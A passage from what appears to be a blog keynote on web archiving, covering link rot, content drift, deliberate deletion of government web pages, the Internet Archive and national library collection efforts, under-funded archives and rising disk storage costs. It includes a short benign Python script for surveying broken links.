The resource’s content evolves and can change to such an extent that it ceases to be representative of the content that was originally referenced.</li></ul></blockquote><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a data-versiondate="20161214231400" data-versionurl="https://web.archive.org/web/20161214231036/https://3.bp.blogspot.com/-G--CbbdzJcY/WFHFf8QTpgI/AAAAAAAADkE/peLWWrbq0i0f-pdGFgc5zG8lwMcNcJzkQCLcB/s1600/journal.pone.0167475.g012.PNG" href="https://3.bp.blogspot.com/-G--CbbdzJcY/WFHFf8QTpgI/AAAAAAAADkE/peLWWrbq0i0f-pdGFgc5zG8lwMcNcJzkQCLcB/s1600/journal.pone.0167475.g012.PNG" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="147" src="https://3.bp.blogspot.com/-G--CbbdzJcY/WFHFf8QTpgI/AAAAAAAADkE/peLWWrbq0i0f-pdGFgc5zG8lwMcNcJzkQCLcB/s200/journal.pone.0167475.g012.PNG" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://journals.plos.org/plosone/article?id=10.1371/journal.pone.0167475">Similarity over time at arXiv</a></td></tr></tbody></table>They <a href="http://dx.doi.org/10.1371/journal.pone.0115253">examined scholarly literature on the Web</a> and found:<br /><blockquote>one out of five STM articles suffering from reference rot, meaning it is impossible to revisit the web context that surrounds them some time after their publication. <b>When only considering STM articles that contain references to web resources, this fraction increases to seven out of ten.</b></blockquote><a href="https://dx.doi.org/10.1371/journal.pone.0167475">The problem gets worse through time</a>:<br /><blockquote><b>even for articles published in 2012 only about 25% of referenced resources remain unchanged by August of 2015.</b> This percentage steadily decreases with earlier publication years, although the decline is markedly slower for arXiv for recent publication years. It reaches about 10% for 2003 through 2005, for arXiv, and even below that for both Elsevier and PMC. </blockquote>Thus, as the arXiv graph shows, they find that, after a few years, it is very unlikely that a reader clicking on a web-at-large link in an article will see what the author intended.<br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-AFpMLEvq11M/WFHEeaHkx2I/AAAAAAAADkA/Hk0OhBYdxsgibc1lCBeq9odMQo6ZhSBUACLcB/s1600/AndyJacksonLinkRot.jpg" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://3.bp.blogspot.com/-AFpMLEvq11M/WFHEeaHkx2I/AAAAAAAADkA/Hk0OhBYdxsgibc1lCBeq9odMQo6ZhSBUACLcB/s200/AndyJacksonLinkRot.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a data-versiondate="20151126132720" data-versionurl="https://web.archive.org/web/*/http://britishlibrary.typepad.co.uk/.a/6a00d8341c464853ef01b7c7cffded970b-pi" href="http://britishlibrary.typepad.co.uk/.a/6a00d8341c464853ef01b7c7cffded970b-pi">Source</a></td></tr></tbody></table>This isn't just a problem for scholarly literature, it is even worse on the general Web. 
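<br /><br />Link rot, at least, is easy to measure for yourself. Here is a minimal sketch of a link-rot survey (standard-library Python; the URLs are placeholders, and a real study must also detect "soft 404s" and content drift, which requires an archived copy to compare against):<br />
<pre>
# A toy link-rot survey: try to fetch each cited URL and classify the
# result. DNS failures and timeouts count as rot, along with 4xx/5xx.
import urllib.error
import urllib.request

CITED_URLS = [          # placeholder references
    "http://example.com/",
    "http://example.com/vanished-page",
]

def status_of(url, timeout=10):
    try:
        with urllib.request.urlopen(url, timeout=timeout) as response:
            return response.status
    except urllib.error.HTTPError as e:
        return e.code   # 404 Not Found, 410 Gone, ...
    except (urllib.error.URLError, OSError):
        return None     # DNS failure or timeout: the link has rotted

for url in CITED_URLS:
    status = status_of(url)
    rotted = status is None or status >= 400
    print(url, status, "ROTTED" if rotted else "alive")
</pre>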
The British Library's Andy Jackson <a data-versiondate="20151126132720" data-versionurl="https://web.archive.org/web/20151126132720/http://britishlibrary.typepad.co.uk/webarchive/2015/09/ten-years-of-the-uk-web-archive-what-have-we-saved.html" href="http://britishlibrary.typepad.co.uk/webarchive/2015/09/ten-years-of-the-uk-web-archive-what-have-we-saved.html">analyzed the UK Web Archive</a> and: <br /><blockquote><b>was shocked by how quickly link rot and content drift come to dominate the scene. 50% of the content is lost after just one year, with more being lost each subsequent year.</b> However, it’s worth noting that the loss rate is not maintained at 50%/year. If it was, the loss rate after two years would be 75% rather than 60%.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote5">[5]</a></sup></blockquote>It isn't just that Web servers can go away or their contents be rewritten. Access to Web pages is mediated by the Domain Name System (DNS), and they can become inaccessible because the domain owner fails to pay the registrar, or their DNS service, or for <a href="http://www.bbc.co.uk/programmes/p031zp5y">political reasons</a>:<br /><blockquote class="tr_bq"><b>In March 2010 every webpage with the domain address ending in .yu disappeared from the internet – the largest ever to be removed. This meant that the internet history of the former Yugoslavia was no longer available online.</b> Dr Anat Ben-David, from the Open University in Israel, has managed to rebuild about half of the lost pages – pages that document the Kosovo Wars, which have been called "the first internet war”.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote8">[8]</a></sup></blockquote>The terms "link rot" and "content drift" suggest randomness, but in many cases they hide deliberate suppression or falsification of information. More than a decade ago, in <a href="http://blog.dshr.org/2007/06/why-preserve-e-journals-to-preserve.html">only my 6<sup>th</sup> blog post</a>, I wrote:<br /><blockquote class="tr_bq">Winston Smith in "1984" was <a href="http://en.wikipedia.org/wiki/Winston_Smith">"a clerk for the Ministry of Truth, where his job is to rewrite historical documents so that they match the current party line"</a>. George Orwell wasn't a prophet. 
Throughout history, governments of all stripes have found the need to employ Winston Smiths and the US government is no exception.</blockquote><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-Yx8YEvyMzFE/Wbne0gkF2kI/AAAAAAAAD48/o4DGZoFylPEGHORtKH9t9kjfr6gEp-8eQCLcBGAs/s1600/o-BUSH-MISSION-ACCOMPLISHED-facebook.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="800" data-original-width="1600" height="100" src="https://1.bp.blogspot.com/-Yx8YEvyMzFE/Wbne0gkF2kI/AAAAAAAAD48/o4DGZoFylPEGHORtKH9t9kjfr6gEp-8eQCLcBGAs/s200/o-BUSH-MISSION-ACCOMPLISHED-facebook.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://i.huffpost.com/gen/2903624/images/o-BUSH-MISSION-ACCOMPLISHED-facebook.jpg">Source</a></td></tr></tbody></table>Examples of Winston Smith's work are everywhere, <a href="http://news.wgbh.org/2017/04/06/innovation-hub-podcast/saving-facts-internet">such as</a>:<br /><blockquote class="tr_bq">George W. Bush’s “Mission Accomplished” press release. The <a href="http://web.archive.org/web/20030513162142/www.whitehouse.gov/news/releases/2003/05/iraq/20030501-15.html" target="_blank">first press release</a> read that ‘combat operations in Iraq have ceased.’ After a couple weeks, <a href="https://web.archive.org/web/20090117070743/http://www.whitehouse.gov/news/releases/2003/05/20030501-15.html" target="_blank">that was changed to</a> ‘major combat operations have ceased.’ And then,<a href="http://www.whitehouse.gov/news/releases/2003/05/20030501-15.html" target="_blank">&nbsp;the whole press release disappeared</a> off the White House’s website completely.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote7">[7]</a></sup></blockquote><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-TO5VTJlQbDs/WYNaP3aISCI/AAAAAAAAD1U/zqgwhQrnvTwTwP_c5-x_Hjs2LeM_ZMHfwCLcBGAs/s1600/liesbusS.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="385" data-original-width="650" height="118" src="https://4.bp.blogspot.com/-TO5VTJlQbDs/WYNaP3aISCI/AAAAAAAAD1U/zqgwhQrnvTwTwP_c5-x_Hjs2LeM_ZMHfwCLcBGAs/s200/liesbusS.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://boingboing.net/2017/07/05/referendumb.html">Source</a></td></tr></tbody></table><a href="https://boingboing.net/2017/07/05/referendumb.html">Britain has its Winston Smiths too</a>:<br /><blockquote class="tr_bq">One of the most enduring symbols of 2016's UK Brexit referendum was the huge red "battle bus" with its message, "We send the EU £350 million a week, let's fund our NHS instead. Vote Leave." ... Independent fact-checkers declared the £350 million figure to be a lie. 
<b>Within hours of the Brexit vote, the Leave campaign <a href="https://boingboing.net/2016/06/27/brexit-leave-campaign-kills-ol.html">scrubbed its website</a> of all its promises, and Nigel Farage <a href="https://boingboing.net/2016/06/24/the-morning-after-the-brexit-v.html">admitted that the £350 million was an imaginary figure</a> and that the NHS would not see an extra penny after Brexit.</b><sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote6">[6]</a></sup></blockquote><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-wtohlca85Yg/WYST7HqfCeI/AAAAAAAAD1s/WWmaSj2Y5T0_3nZrDtqDDLDqflWFxTDxwCLcBGAs/s1600/MAC38_VANISHING_CANADA_POST02.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="462" data-original-width="822" height="111" src="https://2.bp.blogspot.com/-wtohlca85Yg/WYST7HqfCeI/AAAAAAAAD1s/WWmaSj2Y5T0_3nZrDtqDDLDqflWFxTDxwCLcBGAs/s200/MAC38_VANISHING_CANADA_POST02.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://www.macleans.ca/news/canada/vanishing-canada-why-were-all-losers-in-ottawas-war-on-data/">Source</a></td></tr></tbody></table>Data on the Web is equally at risk. Under the Harper administration, Canadian librarians fought a <a href="http://www.macleans.ca/news/canada/vanishing-canada-why-were-all-losers-in-ottawas-war-on-data/">long, lonely struggle with their Winston Smiths</a>:<br /><blockquote class="tr_bq"><b>Protecting Canadians’ access to data is why Sam-Chin Li, a government information librarian at the University of Toronto, worked late into the night with colleagues in February 2013, frantically trying to archive the federal Aboriginal Canada portal before it disappeared on Feb. 12.</b> The decision to kill the site, which had thousands of links to resources for Aboriginal people, had been announced quietly weeks before; the librarians had only days to train with web-harvesting software.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote11">[11]</a></sup></blockquote><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-JaBW6i9RWZU/WYSu7N1eFLI/AAAAAAAAD2A/5CC1ytYZHZ4yEXSGFsj4pQULy48m-EEjgCLcBGAs/s1600/eot_wbm_summary-300x204.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="204" data-original-width="300" height="136" src="https://2.bp.blogspot.com/-JaBW6i9RWZU/WYSu7N1eFLI/AAAAAAAAD2A/5CC1ytYZHZ4yEXSGFsj4pQULy48m-EEjgCLcBGAs/s200/eot_wbm_summary-300x204.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://blog.archive.org/2017/05/09/over-200-terabytes-of-the-government-web-archived/">EOT Crawl Statistics</a></td></tr></tbody></table>A year ago, a similar but much larger emergency data rescue effort <a href="https://blog.archive.org/2017/05/09/over-200-terabytes-of-the-government-web-archived/">swung into action in the US</a>:<br /><blockquote class="tr_bq">Between Fall 2016 and Spring 2017, the Internet Archive archived over 200 terabytes of government websites and data. 
This includes over 100TB of public websites and over 100TB of public data from federal FTP file servers totaling, together, over 350 million URLs/files. </blockquote>Partly this was the collaborative "End of Term" (EOT) crawl that is organized at each change of Presidential term, but this time there was <a href="https://blog.archive.org/2017/05/09/over-200-terabytes-of-the-government-web-archived/">added urgency</a>:<br /><blockquote class="tr_bq">Through the EOT project’s public nomination form and through our collaboration with the <a href="https://www.datarefuge.org/">DataRefuge</a>,&nbsp;<a href="https://envirodatagov.org/">Environmental Data and Governance Initiative (EDGI)</a>, and other efforts, over 100,000 webpages or government datasets were nominated by citizens and preservationists for archiving.</blockquote><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-u-GemAdLwCg/WfiscB7QtrI/AAAAAAAAEAE/SqWfWN36bREOBz-oZ7q1E1MD45QhUMCfgCPcBGAYYCw/s1600/KoreanNova1473.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="533" data-original-width="533" height="200" src="https://4.bp.blogspot.com/-u-GemAdLwCg/WfiscB7QtrI/AAAAAAAAEAE/SqWfWN36bREOBz-oZ7q1E1MD45QhUMCfgCPcBGAYYCw/s200/KoreanNova1473.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://dx.doi.org/10.1038/nature23644">1437 nova remains</a></td></tr></tbody></table>Note the emphasis on datasets. It is important to keep scientific data, especially observations that are not repeatable, for the long term. A recent example is <a href="https://phys.org/news/2017-08-scientists-recover-nova-years-korean.html">Korean astronomers' records of a nova in 1437</a>, which provide strong evidence that:<br /><blockquote><b>"cataclysmic binaries"—novae, novae-like variables, and dwarf novae—are one and the same, not separate entities as has been previously suggested.</b> After an eruption, a nova becomes "nova-like," then a dwarf nova, and then, after a possible hibernation, comes back to being nova-like, and then a nova, and does it over and over again, up to 100,000 times over billions of years.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote12">[12]</a></sup></blockquote><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-xUjrn70bzew/WaixguNxcGI/AAAAAAAAD3c/rMwAtSbporwJSf07Bp9N12TDDctEr5nqgCLcBGAs/s1600/Shang_dynasty_inscribed_scapula.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1232" data-original-width="800" height="200" src="https://1.bp.blogspot.com/-xUjrn70bzew/WaixguNxcGI/AAAAAAAAD3c/rMwAtSbporwJSf07Bp9N12TDDctEr5nqgCLcBGAs/s200/Shang_dynasty_inscribed_scapula.jpg" width="129" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">By <a href="https://commons.wikimedia.org/wiki/User:BabelStone" title="User:BabelStone">BabelStone</a>, <a href="http://creativecommons.org/licenses/by-sa/3.0" title="Creative Commons Attribution-Share Alike 3.0">CC BY-SA 3.0</a><br /><a 
href="https://commons.wikimedia.org/w/index.php?curid=16189953">Source</a></td></tr></tbody></table>580 years is peanuts. An example more than 5 times older is from China. In the <a href="http://blog.dshr.org/2014/12/talk-at-fall-cni.html">Shang dynasty</a>:<br /><blockquote>astronomers inscribed eclipse observations on animal bones. About 3200 years later, researchers used these records to estimate that the accumulated clock error was about 7 hours. From this they derived a value for the <a href="http://dx.doi.org/10.1007/BF00879584">viscosity of the Earth's mantle</a> as it rebounds from the weight of the glaciers.</blockquote>Today, those eclipse records would be on the Web, not paper or bone. Will astronomers 3200 or even 580 years from now be able to use them?<br /><h3>What have we learned about archiving the Web?</h3>I hope I've convinced you that a society whose knowledge base is on the Web is doomed to forget its past unless something is done to preserve it<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote18">[18]</a></sup>. Preserving Web content happens in three stages: <br /><ul><li>Collection</li><li>Preservation</li><li>Access</li></ul><h4>What have we learned about collection?</h4>In the wake of NASA's <a href="http://ws-dl.blogspot.com/2013/03/2013-03-22-ntrs-web-archives-and-why-we.html">March 2013 takedown of their <i>Technical Report Server</i></a> James Jacobs, Stanford's Government Documents librarian, <a href="http://freegovinfo.info/node/3900">stressed the importance of collecting Web content</a>:<br /><blockquote><b>pointing to web sites is much less valuable and much more fragile than acquiring copies of digital information and building digital collections that you control.</b> The OAIS reference model for long term preservation makes this a requirement ... “Obtain sufficient control of the information provided to the level needed to ensure Long-Term Preservation.” <b>Pointing to a web page or PDF at nasa.gov is not obtaining any control.</b></blockquote>Memory institutions need to make their own copies of Web content. Who is doing this?<br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-6V9zH0js0Bc/Wa23r0inZZI/AAAAAAAAD4c/PgbZy4r4Vpc-qJITI90RpvkmjO5qdNnmgCPcBGAYYCw/s1600/300-Funston.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1024" data-original-width="1280" height="160" src="https://4.bp.blogspot.com/-6V9zH0js0Bc/Wa23r0inZZI/AAAAAAAAD4c/PgbZy4r4Vpc-qJITI90RpvkmjO5qdNnmgCPcBGAYYCw/s200/300-Funston.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://en.wikipedia.org/wiki/File:Christian_science_church122908_02.jpg">Internet Archive HQ</a></td></tr></tbody></table>The Internet Archive is by far the largest and most used Web archive, having been trying to collect the whole of the Web for more than two decades. Its "crawlers" start from a large set of "seed" web pages and follow links from them to other pages, then follow those links, according to a set of "crawl rules". Well-linked-to pages will be well represented; they may be important or they may be "link farms". 
Two years ago <a href="https://www.forbes.com/sites/kalevleetaru/2015/11/16/how-much-of-the-internet-does-the-wayback-machine-really-archive/">Kalev Leetaru wrote</a>:<br /><blockquote class="tr_bq"><b>of the top 15 websites with the most snapshots taken by the Archive thus far this year, one is an alleged former movie pirating site, one is a Hawaiian hotel, two are pornography sites and five are online shopping sites.</b> The second-most snapshotted homepage is of a Russian autoparts website and the eighth-most-snapshotted site is a parts supplier for trampolines.</blockquote>The Internet Archive's highly automated collection process may collect a lot of unimportant stuff, but it is the best we have at collecting the "Web at large"<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote25">[25]</a></sup>. The Archive's recycled church in San Francisco and its second site nearby sustain about 40Gb/s outbound and 20Gb/s inbound, serving about 4M unique IPs/day. Each stores over 3*10<sup>11</sup> Web pages, among <a href="https://archive.org/about/">much other content</a>. The Archive has been for many years in the <a href="https://www.alexa.com/siteinfo/archive.org">top 300 Web sites</a> in the world. For comparison, the Library of Congress typically ranks between 4000 and 6000.<br /><br />Network effects mean that technology markets in general and the Web in particular are <a href="http://www.amazon.com/Increasing-Returns-Dependence-Economics-Cognition/dp/0472064967">winner-take-all markets</a>. Just like Google in search, the Internet Archive is the winner in its market. Other institutions can't compete in archiving the whole Web, so they must focus on curated collections.<br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-yPKZ0qeUBCM/WeeOlBEoEbI/AAAAAAAAD-k/lzozXlx1ZLgKJ9RV3iOWFeQPjMtI1vEnQCEwYBhgL/s1600/UK-Web-Archive.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="661" data-original-width="1004" height="131" src="https://3.bp.blogspot.com/-yPKZ0qeUBCM/WeeOlBEoEbI/AAAAAAAAD-k/lzozXlx1ZLgKJ9RV3iOWFeQPjMtI1vEnQCEwYBhgL/s200/UK-Web-Archive.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://www.webarchive.org.uk/ukwa/advancedsearch">UK Web Archive</a></td></tr></tbody></table>The British Library, among other national libraries, has been <a href="http://britishlibrary.typepad.co.uk/webarchive/2015/09/ten-years-of-the-uk-web-archive-what-have-we-saved.html">collecting their "national Web presence"</a> for more than a decade. One problem is defining "national Web presence". Clearly, it is more than the .uk domain, but how much more? The <a href="http://arquivo.pt/">Portuguese Web Archive</a> defines it as the .pt domain plus content embedded in or redirected from the .pt domain. That wouldn't work for many countries, where important content is in top-level domains such as .com.<br /><br />Dr. 
Regan Murphy Kao of Stanford's East Asian Library <a href="https://library.stanford.edu/blogs/stanford-libraries-blog/2017/08/preserving-ephemeral-reflections-archiving-japanese-websites">described their approach to Web collecting</a>:<br /><blockquote class="tr_bq"><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-2P0kMBcY_8E/WYI0E3ZKmXI/AAAAAAAAD0Y/-edajb730bgOHm2QJwMbe_3QDxXc8CkgACLcBGAs/s160/_92604136_maonowafterchemo.png.jpeg" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="371" data-original-width="660" height="111" src="https://1.bp.blogspot.com/-2P0kMBcY_8E/WYI0E3ZKmXI/AAAAAAAAD0Y/-edajb730bgOHm2QJwMbe_3QDxXc8CkgACLcBGAs/s200/_92604136_maonowafterchemo.png.jpeg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://www.bbc.com/news/magazine-37861457">Mao Kobayashi</a></td></tr></tbody></table>we sought to archive a limited number of blogs of ground-breaking, influential figures – people whose writings were widely read and represented a new way of approaching a topic. One of the people we chose was Mao Kobayashi. ... Mao broke with tradition and openly described her experience with cancer in a blog that gripped Japan. She harnessed this new medium to define her life rather than allow cancer to define it.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote3">[3]</a></sup></blockquote><div class="separator" style="clear: both; text-align: center;"></div>Curated collections have a problem. What made the Web transformational was the links (see Google's <a href="https://en.wikipedia.org/wiki/PageRank">PageRank</a>). Viewed in isolation, curated collections break the links and subtract value. But, viewed as an adjunct to broad Web archives, they can add value in two ways:<br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-SgFWjUZusvg/VPDdIgc7FwI/AAAAAAAACrQ/0dURqV-0gCQJAH0n-idyHxNwv3sRyz7CgCPcBGAYYCw/s1600/AndyJacksonIDCC15.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="717" data-original-width="1050" height="136" src="https://3.bp.blogspot.com/-SgFWjUZusvg/VPDdIgc7FwI/AAAAAAAACrQ/0dURqV-0gCQJAH0n-idyHxNwv3sRyz7CgCPcBGAYYCw/s200/AndyJacksonIDCC15.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://www.dcc.ac.uk/sites/default/files/documents/IDCC15/Presentations%20Day%202/B3/IDCC15-UKWA-Open-Data.pdf">UK Web Archive link analysis</a></td></tr></tbody></table><ul><li>By providing quality assurance, using greater per-site resources to ensure that important Web resources are fully collected.</li><li>By providing researchers better access to preserved important Web resources than the Internet Archive can. For example, better text search or data mining. 
The British Library has been a <a href="http://www.dcc.ac.uk/webfm_send/1911">leader in this area</a>.</li></ul>Nearly one-third of a trillion Web pages at the Internet Archive is impressive, but in 2014 I reviewed the research into <a href="http://blog.dshr.org/2014/03/the-half-empty-archive.html">how much of the Web was then being collected</a><sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote13">[13]</a></sup> and concluded:<br /><blockquote class="tr_bq">Somewhat less than half ... Unfortunately, there are a number of reasons why this simplistic assessment is wildly optimistic.</blockquote>Costa <i>et al</i> ran <a href="https://doi.org/10.1007/s00799-016-0171-9">surveys in 2010 and 2014 and concluded in 2016</a>: <br /><blockquote class="tr_bq"><b>during the last years there was a significant growth in initiatives and countries hosting these initiatives, volume of data and number of contents preserved.</b> While this indicates that the web archiving community is dedicating a growing effort on preserving digital information, <b>other results presented throughout the paper raise concerns such as the small amount of archived data in comparison with the amount of data that is being published online</b>.</blockquote>I <a href="http://blog.dshr.org/2017/03/the-amnesiac-civilization-part-1.html">revisited this topic</a> earlier this year and concluded that we were losing ground rapidly. Why is this? The reason is that collecting the Web is expensive, whether it uses human curators or large-scale technology, and that <a href="http://blog.dshr.org/2017/03/the-amnesiac-civilization-part-2.html">Web archives are pathetically under-funded</a>:<br /><blockquote class="tr_bq">The <a href="https://www.guidestar.org/profile/94-3242767">Internet Archive's budget</a> is in the region of $15M/yr, about half of which goes to Web archiving. The budgets of all the other public Web archives might add another $20M/yr. The total worldwide spend on archiving Web content is probably less than $30M/yr, for content that cost hundreds of billions to create<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote19">[19]</a></sup>.</blockquote><a href="http://blog.dshr.org/2014/03/the-half-empty-archive.html">My rule of thumb</a> has been that collection takes about half the lifetime cost of digital preservation, preservation about a third, and access about a sixth. So the world may spend only about $15M/yr collecting the Web.<br /><br />As an Englishman speaking in this forum, I should also observe that, like the Web itself, archiving is biased towards English. For example, pages in Korean are less than half as likely to be collected as pages in English<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote20">[20]</a></sup>.<br /><h4>What have we learned about preservation?</h4>Since Jeff Rothenberg's seminal 1995 <a href="http://www.jstor.org/stable/24980135"><i>Ensuring the Longevity of Digital Documents</i></a>, it has been commonly assumed that digital preservation revolved around the problem of formats becoming obsolete, and thus their content becoming inaccessible. But in the Web world <a href="http://blog.dshr.org/2012/10/formats-through-time.html">formats go obsolete very slowly if at all</a>. 
The real problem is simply <a href="http://blog.dshr.org/2007/06/petabyte-for-century.html">storing enough bits reliably enough</a> for the long term.<sup><a href="http://blog.dshr.org/2017/11/keynote-at-pacific-neighborhood.html#Footnote9">[9]</a></sup><br /><br /><div class="separator" style="clear: both; text-align: center;"></div><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-ftr_yWIaFF0/UGiy2qCbD-I/AAAAAAAABgE/yzw3ff5LTbEPvtGMoLhdjEHqKgUC0C_MwCPcBGAYYCw/s1600/Hard_drive_capacity_over_time.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="400" data-original-width="600" height="133" src="https://4.bp.blogspot.com/-ftr_yWIaFF0/UGiy2qCbD-I/AAAAAAAABgE/yzw3ff5LTbEPvtGMoLhdjEHqKgUC0C_MwCPcBGAYYCw/s200/Hard_drive_capacity_over_time.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Kryder's Law</td></tr></tbody></table>Or rather, since we actually know how to store bits reliably, it is finding enough money to store enough bits reliably enough for the long term. This used to be a problem we could ignore. Hard disk, a 60-year-old technology, is the dominant medium for bulk data storage. It had a remarkable run of more than 30 years of 30-40%/year price declines; Kryder's Law, the disk analog of Moore's Law. The rapid cost decrease meant that if you could afford to store data for a few years, you could afford to store it "forever".<br /><br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-ftIigC27xmM/UxkvyExYfNI/AAAAAAAACjU/I8tZ1VfdAekB-6bQ4NgNRxyTuPPkbcIMACPcBGAYYCw/s1600/disk_price_fall.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="600" data-original-width="800" height="150" src="https://4.bp.blogspot.com/-ftIigC27xmM/UxkvyExYfNI/AAAAAAAACjU/I8tZ1VfdAekB-6bQ4NgNRxyTuPPkbcIMACPcBGAYYCw/s200/disk_price_fall.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Kryder's Law breakdown</td></tr></tbody></table>Just as Moore's Law slowed dramatically as the technology approached the physical limits, so did Kryder's Law. The slowing started in 2010, and was followed by the 2011 floods in Thailand, causing disk prices to double and not recover for 3 years. In 2014 we predicted Kryder rates going forward between 10-20%, the red lines on the graph, <a href="http://blog.dshr.org/2014/03/the-half-empty-archive.html">meaning that</a>:<br /><blockquote class="tr_bq">If the industry projections pan out ... 
by 2020 disk costs per byte will be between <i>130 and 300 times higher</i> than they would have been had Kryder's Law continued.</blockquote><div class="separator" style="clear: both; text-align: center;"></div><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-8PdsWOGOUSw/WZoRoWgqbLI/AAAAAAAAD2k/d69WScG1zjc9wGmcGGlUhV-vIUYrfW91ACPcBGAYYCw/s1600/EcoModelGraph.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="600" data-original-width="800" height="150" src="https://4.bp.blogspot.com/-8PdsWOGOUSw/WZoRoWgqbLI/AAAAAAAAD2k/d69WScG1zjc9wGmcGGlUhV-vIUYrfW91ACPcBGAYYCw/s200/EcoModelGraph.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://blog.dshr.org/2017/08/economic-model-of-long-term-storage.html">Economic model output</a></td></tr></tbody></table><a href="http://blog.dshr.org/2017/07/patting-myself-on-back.html">So far, our prediction has proved correct</a>, which is bad news. The graph shows the endowment, the money which, deposited with the data and invested at interest, will cover the cost of storage 